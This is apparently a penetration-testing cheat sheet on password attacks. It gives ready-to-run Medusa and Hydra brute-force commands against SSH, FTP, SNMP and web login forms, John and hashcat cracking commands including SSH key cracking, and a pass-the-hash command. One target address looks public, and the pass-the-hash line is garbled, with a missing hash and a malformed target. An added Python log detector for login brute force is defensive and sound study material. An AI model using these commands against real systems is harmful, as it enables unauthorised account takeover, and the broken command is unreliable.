# Password attacks

#### `/usr/share/wordlists`

### Medusa

Brute force HTTP basic authentication.

```
medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10
```

### Hydra

Can be used to brute force numerous services.

```
hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin
```

#### Brute force http-post login forms

```
Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
```
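
Seen from the defending side, the form attack above shows up in the web server's access log as a burst of POSTs to the login page from one address. The following is an added example, not part of the original notes: it assumes combined-format access logs with each client's lines in time order and a threshold of 20 POSTs per 60 seconds; `find_bruteforce`, `sample_log` and the 192.0.2.x addresses are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_bruteforce(lines, login_path, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: peak count of login POSTs seen inside one window} for
    every client that reaches `threshold` (an assumed value, tune per site)."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue              # not a combined-format line
        ip, ts, method, path, _status = m.groups()
        # Count requests, not status codes: a form that answers a bad password
        # with an error string in the page body often still returns 200.
        if method != "POST" or path.split("?")[0] != login_path:
            continue
        now = datetime.strptime(ts, TS_FMT)
        q = recent[ip]
        q.append(now)
        while now - q[0] > window:
            q.popleft()           # drop attempts older than the window
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed log lines (documentation addresses), not real traffic."""
    def entry(ip, sec, method, path):
        return (f'{ip} - - [12/Mar/2024:10:{sec // 60:02d}:{sec % 60:02d} +0000] '
                f'"{method} {path} HTTP/1.1" 200 1534')
    login = "/department/login.php"
    lines = [entry("192.0.2.50", s, "POST", login) for s in range(45)]      # 1 per second
    lines += [entry("192.0.2.10", s, "POST", login) for s in (0, 90, 400)]  # a user retrying
    lines.append(entry("192.0.2.10", 95, "GET", "/department/index.php"))
    return lines

if __name__ == "__main__":
    for ip, peak in find_bruteforce(sample_log(), "/department/login.php").items():
        print(f"{ip}: {peak} login POSTs within 60 s")
```
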

### John the Ripper

```
john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt
```

#### SSH keys

To crack an SSH key's password, convert the key to a hash, then crack it using John.

```
python ssh2john.py id_rsa > id_rsa.hash
```

### Hashcat

**Check for the mode on the wiki page:** <https://hashcat.net/wiki/doku.php?id=example_hashes>

```
hashcat -m <mode> -a 0 hash.txt Pass.txt
```

### Passing the hash (Windows)

Create the environment variable `SMBHASH`, containing the hash we want to pass:

`export SMBHASH=hashvalue`

Use pth-winexe to authenticate:

`pth-winexe -U administrator% //10.11.0.1.76.cmd`

